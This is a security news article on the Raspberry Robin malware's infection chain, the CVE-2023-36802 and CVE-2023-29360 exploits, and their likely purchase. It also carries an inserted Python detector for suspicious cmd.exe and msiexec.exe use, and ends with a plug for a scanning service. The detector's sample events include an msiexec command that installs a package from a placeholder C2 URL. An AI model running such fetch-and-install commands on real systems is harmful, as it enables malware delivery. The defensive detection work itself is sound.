The malware, first spotted in September 2021, has been targeting organizations in the technology and manufacturing industries. It uses cmd.exe to read and execute a file stored on the infected external drive, and it uses msiexec.exe for outbound network communication to a rogue domain serving as C2, from which it downloads and installs a DLL library file.
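As an added illustration of the two behaviours just described (this is example code, not part of the report or of Check Point's analysis), the following Python detector runs over constructed process-creation events and flags msiexec.exe installing a package straight from a URL and cmd.exe executing a file from a drive other than the system drive. The event fields, the sample domain and the "anything but C: is external" heuristic are assumptions.

```python
import json
import re

# Constructed sample process-creation events (not real telemetry); the field
# names are an assumed simplification of a Sysmon/EDR "process create" record.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /R "E:\RECYCLER\x.bat"', "parent": "explorer.exe"},
    {"host": "ws01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://example-c2.invalid/a.msi", "parent": "cmd.exe"},
    {"host": "ws02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\Downloads\setup.msi", "parent": "explorer.exe"},
    {"host": "ws02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Temp", "parent": "explorer.exe"},
]

# msiexec.exe handed a package URL: the installer itself performs the download,
# which is the "msiexec.exe for network communication" behaviour in the text.
MSIEXEC_URL = re.compile(r"msiexec(\.exe)?\b.*\bhttps?://", re.IGNORECASE)

# cmd.exe reading/executing a file from a non-system drive letter.
# ASSUMPTION: every drive letter other than C: is treated as removable/external.
CMD_EXTERNAL_DRIVE = re.compile(r"cmd(\.exe)?\b.*\b(?:[D-Z]):\\", re.IGNORECASE)


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    image = event["image"].lower()
    cmdline = event["cmdline"]
    hits = []
    if image.endswith("msiexec.exe") and MSIEXEC_URL.search(cmdline):
        hits.append("msiexec_remote_package")
    if image.endswith("cmd.exe") and CMD_EXTERNAL_DRIVE.search(cmdline):
        hits.append("cmd_exec_from_external_drive")
    return hits


def scan(events):
    """Map host -> sorted list of labels seen on that host."""
    per_host = {}
    for ev in events:
        for label in classify(ev):
            per_host.setdefault(ev["host"], set()).add(label)
    return {host: sorted(labels) for host, labels in per_host.items()}


def hosts_with_full_chain(events):
    """Hosts showing both stages: cmd.exe from an external drive and msiexec.exe fetching a URL."""
    return sorted(host for host, labels in scan(events).items() if len(labels) == 2)


if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Only ws01 shows both stages; ws02's local msiexec install and plain cmd.exe usage are left alone, which is the point of combining the two weak signals rather than alerting on either alone.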
Check Point researchers have detailed the evolution of Raspberry Robin, noting that its authors have integrated these new exploits, which indicates either access to an exploit seller or in-house development of the exploits by the malware authors. The malware has been updated with new features and new evasion capabilities, changing its communication method and its lateral movement to avoid detection.
One of the vulnerabilities, CVE-2023-36802, is a type confusion issue in Microsoft Streaming Service Proxy that allows local attackers to escalate privileges to SYSTEM. It was disclosed on September 12, but had been exploited in the wild as a zero-day before that disclosure. Analysis of samples from before October revealed that the operators also used an exploit for CVE-2023-29360, which was publicly disclosed in June and employed by Raspberry Robin in August.
The report concludes that the Raspberry Robin operators most likely purchased the 1-day exploits from an exploit developer. This is based on several observations, including that the exploits are delivered as an external 64-bit executable and that they lack the heavy obfuscation and control-flow flattening found in Raspberry Robin's main component.
Source: Securityaffairs
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try it yourself using check.website.